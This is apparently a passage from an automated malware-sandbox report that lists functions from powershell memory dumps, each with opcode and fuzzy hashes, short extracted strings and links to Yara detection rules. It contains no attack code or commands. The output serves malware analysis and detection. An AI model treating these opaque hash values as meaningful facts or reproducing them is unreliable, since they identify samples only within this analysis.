                    • API String ID:
                    • Opcode ID: 89bdb9cd1f7784941dea14b677b50d3c0ba423fb9a6df583c04f949923ed9551
                    • Instruction ID: ef641e9255f624ae65170609e5bff3b83d1513b518aac361524a6c5151f19f52
                    • Opcode Fuzzy Hash: 89bdb9cd1f7784941dea14b677b50d3c0ba423fb9a6df583c04f949923ed9551
                    • Instruction Fuzzy Hash: 0FE16A72B5FA8E1FEBA5DBA848745B47BE1EF55310F0901BAD85DC71F3CA68A9018301
                    Function 00007FFD9B957625 Relevance: .4, Instructions: 444COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.2398260931.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a979e287f6334f42a1c3988e41f391937e97ae06bc3a083de518e0fb7822d20b
                    • Instruction ID: 128bb6eeaa973763072d48d34c40e826bc5a6ff3ccf84f2609d41f0f25995a71
                    • Opcode Fuzzy Hash: a979e287f6334f42a1c3988e41f391937e97ae06bc3a083de518e0fb7822d20b
                    • Instruction Fuzzy Hash: AED14422B1FA8E1FEBA59BA848645B47BE1EF55210B0901FBD85CC70E3ED5CAE05C341
                    Function 00007FFD9B9567A7 Relevance: .2, Instructions: 156COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.2398260931.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7b57c302901e75ed439ba484951c17ceeed804b1c3de507a55bb857be7a50436
                    • Instruction ID: 027dc0a158c70d35cde9ffcf12c16f63b5a51a28bdbf7a729fad04037b1a88f0
                    • Opcode Fuzzy Hash: 7b57c302901e75ed439ba484951c17ceeed804b1c3de507a55bb857be7a50436
                    • Instruction Fuzzy Hash: 54510422B6FACE1FE7A5EBA848705B46BE1EF55310B5900BAD95CC71F3DD68A8448301
                    Function 00007FFD9B957822 Relevance: .1, Instructions: 112COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.2398260931.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e11bfd25fbbd569f2781c350e82ab349c820321c0dca51ba848480c14f606888
                    • Instruction ID: 940a45094ad2fcb2c90de9ce8d3e7b43ed9bf1e716a25e8c9040a9d129220c32
                    • Opcode Fuzzy Hash: e11bfd25fbbd569f2781c350e82ab349c820321c0dca51ba848480c14f606888
                    • Instruction Fuzzy Hash: CA312A62F6FADE1BF3B697D818B11B467C1AF10250B1901BAD95CC30E3ED5C6E00C241
                    Function 00007FFD9B883535 Relevance: .0, Instructions: 49COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.2397540799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                    • Instruction ID: 1fa9c4b6de25af3c09eeda563ddac642f27ce745a1e9786955744c945ca2b0d9
                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                    • Instruction Fuzzy Hash: 2A01A77020CB0C4FD748EF0CE451AA5B3E0FB89320F10056DE58AC36A1DA32E881CB41

                    Executed Functions

                    Function 02A5F1F0 Relevance: .3, Instructions: 281COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227709950.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_2a50000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 123653cfaa0d08fa25b373355ee41dbefbe27b34937f7fc624fd01b97f78ac6c
                    • Instruction ID: de159368e665a586b00941eaf5c93c94a245b8bb3aa73b3ff501cec7ebdaacc0
                    • Opcode Fuzzy Hash: 123653cfaa0d08fa25b373355ee41dbefbe27b34937f7fc624fd01b97f78ac6c
                    • Instruction Fuzzy Hash: 7BB13CB0E002198FDF14CFA9D98579EBBF2BF89318F148129D815E7694EF749845CB81
                    Function 02A5FAC0 Relevance: .3, Instructions: 266COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227709950.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_2a50000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8115deaa565e09bd2f04796e27b0724d72ff5af0b5c37cc4dd1dea837f6691eb
                    • Instruction ID: ec73d7fb9b52f13ccaaf1caa91d84cd1fd0572073e772625a23d6e7232885b30
                    • Opcode Fuzzy Hash: 8115deaa565e09bd2f04796e27b0724d72ff5af0b5c37cc4dd1dea837f6691eb
                    • Instruction Fuzzy Hash: D4B18E71E00219CFDB10CFA9D89179EBBF2AF89318F148529DC15EB694EF349845CB81
                    Function 06E43D38 Relevance: 15.5, Strings: 12, Instructions: 492COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                    • API String ID: 0-879563280
                    • Opcode ID: 83e59e036582c281c740cefaa3410da79281807a559c7bae1b80d45dd6a3fc39
                    • Instruction ID: 000a246d0816b32de4200319522a07ad045fdc49973562a7f700212afd5aba58
                    • Opcode Fuzzy Hash: 83e59e036582c281c740cefaa3410da79281807a559c7bae1b80d45dd6a3fc39
                    • Instruction Fuzzy Hash: 38F14731F04344DFDB65AE79A8047AABBF2EF85315F2484AAD805CF291DB31C845C7A2
                    Function 06E47110 Relevance: 13.5, Strings: 10, Instructions: 1037COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                    • API String ID: 0-2890353280
                    • Opcode ID: cb3d9c1b32ed6d856da704c8177c173e76d8da6169d3da341cf255af28abdb02
                    • Instruction ID: 4fd028ef61cdd65f8a9f91c7616ae01af12848725eda2c8bd7e130fe1ce41ae1
                    • Opcode Fuzzy Hash: cb3d9c1b32ed6d856da704c8177c173e76d8da6169d3da341cf255af28abdb02
                    • Instruction Fuzzy Hash: C692A474E00314CFDB64EB68D855BAABBF2AF88344F1494A9D509AF381CB35DC85CB91
                    Function 06E491D0 Relevance: 13.0, Strings: 10, Instructions: 493COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                    • API String ID: 0-3512890053
                    • Opcode ID: abf2fd51d596c53bbe11abc28111c7994d4d5b10783287c7c82cbac45639b3e2
                    • Instruction ID: 56b9c57bf39772c2069a652f385bf550d8c15d576da2805fe975137dc048e491
                    • Opcode Fuzzy Hash: abf2fd51d596c53bbe11abc28111c7994d4d5b10783287c7c82cbac45639b3e2
                    • Instruction Fuzzy Hash: 9AF14835F003148FCB68AF79E4546ABBBE2AFC5215B2484AAD509EF342DF35D841C7A1
                    Function 06E48BF0 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                    • API String ID: 0-2822668367
                    • Opcode ID: 9717ac74b2b03546731ee411a768f4e71a8e6badcc211a13c8569a8a2a9de7e3
                    • Instruction ID: 29f16e7f703f472f76c9ce4fafe44bc42f6278240540f9f6d90796980d95d9ec
                    • Opcode Fuzzy Hash: 9717ac74b2b03546731ee411a768f4e71a8e6badcc211a13c8569a8a2a9de7e3
                    • Instruction Fuzzy Hash: F9D1A074E002088FDB58EB68D455BAFBBB3AF88305F24C469D9056F385CB75EC858B91
                    Function 06E4B060 Relevance: 5.6, Strings: 4, Instructions: 576COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q$4'^q$4'^q
                    • API String ID: 0-1420252700
                    • Opcode ID: 852c32cded49af0f635cdfa592d0e6571d23f7a3cf51c6adc541869196c9df9e
                    • Instruction ID: c6b3fb41abda0aae2f336498a9133cd5f190c252213df5f3872a6a5b238947a5
                    • Opcode Fuzzy Hash: 852c32cded49af0f635cdfa592d0e6571d23f7a3cf51c6adc541869196c9df9e
                    • Instruction Fuzzy Hash: BC126735F04314CFCB69AA79A8157AABBA29FC5315F1480BAD905DF381DF35C882C7A1
                    Function 02A5BB00 Relevance: 4.3, Strings: 3, Instructions: 517COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227709950.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_2a50000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: Hbq$$^q$$^q
                    • API String ID: 0-1611274095
                    • Opcode ID: 7c538142569981061baa93c8f0c914d4757163a7c73b57a0aaa2ff073ea5362e
                    • Instruction ID: 3cfa5c2fc8895a9c344525a6e05ae1bf22c187daed7846cf522bff460acec5ab
                    • Opcode Fuzzy Hash: 7c538142569981061baa93c8f0c914d4757163a7c73b57a0aaa2ff073ea5362e
                    • Instruction Fuzzy Hash: 37224D34B002289FCB25DB24D8947AEB7B2BF89315F1184E9D80AAB355DF359D81CF91
                    Function 06E49850 Relevance: 4.0, Strings: 3, Instructions: 283COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q$$^q
                    • API String ID: 0-953868773
                    • Opcode ID: 9bed57fb95d02fd739d2486ad6853fc9e3ed920cf82550a9dba8a1105fc621c8
                    • Instruction ID: bd35f191197f984fe126bc618b7bc6fabceea4c1b19b00e7a30f4a75e5907cfb
                    • Opcode Fuzzy Hash: 9bed57fb95d02fd739d2486ad6853fc9e3ed920cf82550a9dba8a1105fc621c8
                    • Instruction Fuzzy Hash: 8D915830F043048FCB69AB3898153AB7BE2AF85309F1484AAD545EF396DE36CC44C7A1
                    Function 06E48BD2 Relevance: 4.0, Strings: 3, Instructions: 268COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q$4'^q
                    • API String ID: 0-1196845430
                    • Opcode ID: 4377b062537ab3fcd9904810a641f7b87d4d2edb0f5c3e83a9d323aa6568ac48
                    • Instruction ID: 8ea9f29f718af4c5a78f9b3b591cb223697a019b7e189f0c61852223036002a6
                    • Opcode Fuzzy Hash: 4377b062537ab3fcd9904810a641f7b87d4d2edb0f5c3e83a9d323aa6568ac48
                    • Instruction Fuzzy Hash: 70B1BF74E003089FDB58EF68D854B9ABBB2AF88309F24C459D9056F385CB75EC85CB91
                    Function 06E46468 Relevance: 3.3, Strings: 2, Instructions: 833COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q
                    • API String ID: 0-2697143702
                    • Opcode ID: 3a76b3e06151ea2c21c7b4a61e7c366d57aaa04c26403df35f95b485a8aa2f36
                    • Instruction ID: 2a41c0963a98f234bc8d566965ca6f5a3d698c7a95eb4a0cf440a67a828cc1e8
                    • Opcode Fuzzy Hash: 3a76b3e06151ea2c21c7b4a61e7c366d57aaa04c26403df35f95b485a8aa2f36
                    • Instruction Fuzzy Hash: 4F723D74A00314CFDB54DB68C459BAABBF2AF8A304F24C069D9099F395DB76EC45CB81
                    Function 06E47B23 Relevance: 2.9, Strings: 2, Instructions: 395COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q
                    • API String ID: 0-2697143702
                    • Opcode ID: c54dd402c834f1dbbf92db492513273bb1bc7fb1fccd17ef72507d537e84df75
                    • Instruction ID: ca5a8ec5f41415572850ec797488d44d39b6d6a0d7bee394c9e417453f822660
                    • Opcode Fuzzy Hash: c54dd402c834f1dbbf92db492513273bb1bc7fb1fccd17ef72507d537e84df75
                    • Instruction Fuzzy Hash: A7F19074B002149FDB64EB68C955BAABBF3EF88344F1080A9D5096F381CB75ED818F91
                    Function 06E4644B Relevance: 1.9, Strings: 1, Instructions: 650COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q
                    • API String ID: 0-1614139903
                    • Opcode ID: 1c490e29235a847b8ffd2c827c3a2c5e7d90904e78f58f132e7bf88e11c71164
                    • Instruction ID: 52cee0a77f879983f0236871761cb90e7f69040d1c0538159b75809beba10a99
                    • Opcode Fuzzy Hash: 1c490e29235a847b8ffd2c827c3a2c5e7d90904e78f58f132e7bf88e11c71164
                    • Instruction Fuzzy Hash: 0A524B74A00314CFDB94DB68C455B9ABBB2EF8A304F14C0A9D9099F395DB76EC46CB81
                    Function 06E49834 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q
                    • API String ID: 0-1614139903
                    • Opcode ID: 7f7852c0a88aa20db8e5657f483552c29bcfeaa95420803ad6bfebd512cdc57e
                    • Instruction ID: 1820e98188f157159bcb32783a784365d57315c411092942794782b28e899733
                    • Opcode Fuzzy Hash: 7f7852c0a88aa20db8e5657f483552c29bcfeaa95420803ad6bfebd512cdc57e
                    • Instruction Fuzzy Hash: EA412530F00300CFDBA4EE34A45576B7BE2AF85258B1490A5D601BF257D736DC44C7A1
                    Function 06E4454C Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: tP^q
                    • API String ID: 0-2862610199
                    • Opcode ID: 8a64954335e48946bfac965e8c906209b60a21c67fd2fc566213bea9df95690f
                    • Instruction ID: d64cae23407023c02007a2f7269e48500067b0ae9b8cb78bff4b47ea687f3fa2
                    • Opcode Fuzzy Hash: 8a64954335e48946bfac965e8c906209b60a21c67fd2fc566213bea9df95690f
                    • Instruction Fuzzy Hash: A741E171F05380DFD7529F24A814A66BFF1AF86304F09C8DAD4849F292CA319C46CBA2
                    Function 06E46D51 Relevance: .5, Instructions: 459COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2f1f7e30a241573dcdd752dacbfaa5e326a503ec47075058213cc02bdf3d368b
                    • Instruction ID: 8aa049b5e85884cc57c01c0d08736ccbbfb0b0c313f8f4d4c8651c8b3aa6157a
                    • Opcode Fuzzy Hash: 2f1f7e30a241573dcdd752dacbfaa5e326a503ec47075058213cc02bdf3d368b
                    • Instruction Fuzzy Hash: A4122C34A00314CFDB94EB68C555BAABBB2EF85304F25C0A9D9099F391DB72EC45CB81
                    Function 02A54EA8 Relevance: .3, Instructions: 334COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227709950.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_2a50000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 84dd1c8f07a4a4276164c464e7f8a249b4a60e34fc011bee526e5a81238673f5
                    • Instruction ID: c98dd715b43b831df557be8ff659661811feced7cfd83481a119e8750e626f29
                    • Opcode Fuzzy Hash: 84dd1c8f07a4a4276164c464e7f8a249b4a60e34fc011bee526e5a81238673f5
                    • Instruction Fuzzy Hash: 20D11A74A01228AFDB04CF98D484A9EFBB2FF49310F648559E815AB351CB75ED86CB90
                    Function 02A545C0 Relevance: .3, Instructions: 323COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227709950.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_2a50000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5a6a4d30fac50c583690fed173ebbfde19ecfaeff25b9bced8cbde01a1b716fc
                    • Instruction ID: 685ced086e0409fcbc0f7bb24df7bc9dba8aef6e159144b90cc0bf32a260a250
                    • Opcode Fuzzy Hash: 5a6a4d30fac50c583690fed173ebbfde19ecfaeff25b9bced8cbde01a1b716fc
                    • Instruction Fuzzy Hash: 6BD1E574A01218EFDB14CF98D484AAEBBF2FF48314F248559E809AB755CB31ED81CB90
                    Function 02A59580 Relevance: .3, Instructions: 320COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227709950.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_2a50000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 51e74e3e9ccf93ed054dee01bea6b0e37cd834f4708b75cb853c7c1bc3c25898
                    • Instruction ID: dfe4130d4c24159bb1053b13367f4958a339698e8ae654581291bf27d23ea269
                    • Opcode Fuzzy Hash: 51e74e3e9ccf93ed054dee01bea6b0e37cd834f4708b75cb853c7c1bc3c25898
                    • Instruction Fuzzy Hash: C8C18C35A00259DFCB14DFA4C584A9EBBB2FF84314F158559E806AF365CB38ED89CB90
                    Function 02A5F1E4 Relevance: .3, Instructions: 278COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227709950.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_2a50000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e97d9b9003b484d686f8fd8c33719a69b697354252ad175931f47521bf0ca46f
                    • Instruction ID: ad50397e993ab34f31dd2c8168827d4e2173e03a4fb01499307caad1641ea5ac
                    • Opcode Fuzzy Hash: e97d9b9003b484d686f8fd8c33719a69b697354252ad175931f47521bf0ca46f
                    • Instruction Fuzzy Hash: FDB14BB0E002199FDF10CFA9D98579EBBF2BF89318F148129E815E7694EF749845CB81
                    Function 02A5FAB4 Relevance: .3, Instructions: 265COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227709950.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_2a50000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3ce2d55f6a196e5f70b1c27200c029ae8cca3aa7937369685baa2d060b9f910c
                    • Instruction ID: a2f4c630ca713be7008b3ef9af855528f553392a3b00e3c4ecbe60821039daae
                    • Opcode Fuzzy Hash: 3ce2d55f6a196e5f70b1c27200c029ae8cca3aa7937369685baa2d060b9f910c
                    • Instruction Fuzzy Hash: C2B16BB1E00219CFDB10CFA9D89179EBBF2AF49318F148529D819EB694EF749845CB81
                    Function 06E460C0 Relevance: .2, Instructions: 247COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5c77c627a9479f8e181b7e9ec6596a93d8772c01dee970f32fec8e80262e788d
                    • Instruction ID: cb95f2e9720f9bbb788cd50a38bfc23e83ab66a10f9546f4b3a8bf5dcd7718f8
                    • Opcode Fuzzy Hash: 5c77c627a9479f8e181b7e9ec6596a93d8772c01dee970f32fec8e80262e788d
                    • Instruction Fuzzy Hash: 8F916F74B003049FDB54EB68C559BAEBBF3AB8A304F50C069D9056F385CB75EC858B91
                    Function 02A52B48 Relevance: .2, Instructions: 236COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227709950.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_2a50000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4c1d5f20b6d758719112f5f03d3dffd64ba5abbe0a33a41f88e4388a2e3ae955
                    • Instruction ID: 556a05da64626d7a347c492fde9ec750285d475d9c3ad6e6ad47710f068fd680
                    • Opcode Fuzzy Hash: 4c1d5f20b6d758719112f5f03d3dffd64ba5abbe0a33a41f88e4388a2e3ae955
                    • Instruction Fuzzy Hash: 9CA1CFB4A006198FCB05CF59C8D4AAFFBB1FF88314B24859AD815AB365C735EC51CB90
                    Function 06E460A0 Relevance: .2, Instructions: 229COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 59fd727536f4a4ff265583d24eee7a04521185001250e5410d6762e9972d02c6
                    • Instruction ID: 33123fab57028cb99101dc7e2fd524f9f541b9c2810d30fb194a0c3a87929731
                    • Opcode Fuzzy Hash: 59fd727536f4a4ff265583d24eee7a04521185001250e5410d6762e9972d02c6
                    • Instruction Fuzzy Hash: 9391BF74B003049FD754EB64C559BAEBBB2AF8A308F50C069E5056F392CB76EC85CB91
                    Function 02A58DE8 Relevance: .2, Instructions: 200COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227709950.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_2a50000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e1790e51371a75b9f8db46c475381e9bbc002578e366604101180bc8e70ab383
                    • Instruction ID: bc84fd0f18fdeb091a39785c8396672bced310a0d3089949c9486bd37e5fc624
                    • Opcode Fuzzy Hash: e1790e51371a75b9f8db46c475381e9bbc002578e366604101180bc8e70ab383
                    • Instruction Fuzzy Hash: 00718F34A11254DFCB15CB74D9849AEBBF2FF89314F1584AAE805AB361CB39EC85CB50
                    Function 02A59D48 Relevance: .2, Instructions: 191COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227709950.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_2a50000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 91eb901bb732a9b1813d05355fb506b0e758ce97e4fc5c094fba5b5ccd772474
                    • Instruction ID: 056374305716f97a555bb16f05435953d0cca2b011e82240c4d751d9d5346838
                    • Opcode Fuzzy Hash: 91eb901bb732a9b1813d05355fb506b0e758ce97e4fc5c094fba5b5ccd772474
                    • Instruction Fuzzy Hash: B8719130A00219DFCB14DFA9C884A9EBBF6FF84314F148969E8199B351DB71AC46CF90
                    Function 02A59EB6 Relevance: .2, Instructions: 188COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227709950.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_2a50000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 94ca563b8438eef7b1f83b9b874a438b8f7f8b955cf618876520ccabd93286b1
                    • Instruction ID: 34fdae40edb8ec30021308243e511906882e8bea000bec3bc3092921f5fcffea
                    • Opcode Fuzzy Hash: 94ca563b8438eef7b1f83b9b874a438b8f7f8b955cf618876520ccabd93286b1
                    • Instruction Fuzzy Hash: F6713A30E00218DFDB14DFA5D484BAEBBB6BF88308F148569D815AB250DB75AC86CF91
                    Function 02A59D33 Relevance: .1, Instructions: 145COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227709950.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_2a50000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b538fe70f3b1c0be1866de3052798c38abc5578ee934fc728f254accbcfd418f
                    • Instruction ID: 3607e19f1bbbd0b6e457d8df97fb19fe15d2da8d53a0f295ed412e8af934ae6c
                    • Opcode Fuzzy Hash: b538fe70f3b1c0be1866de3052798c38abc5578ee934fc728f254accbcfd418f
                    • Instruction Fuzzy Hash: EB513D70E00219DFDB14DFA5C9947AEBBB6BF84304F148869D406AB390DBB5A885CF90
                    Function 06E4B044 Relevance: .1, Instructions: 120COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
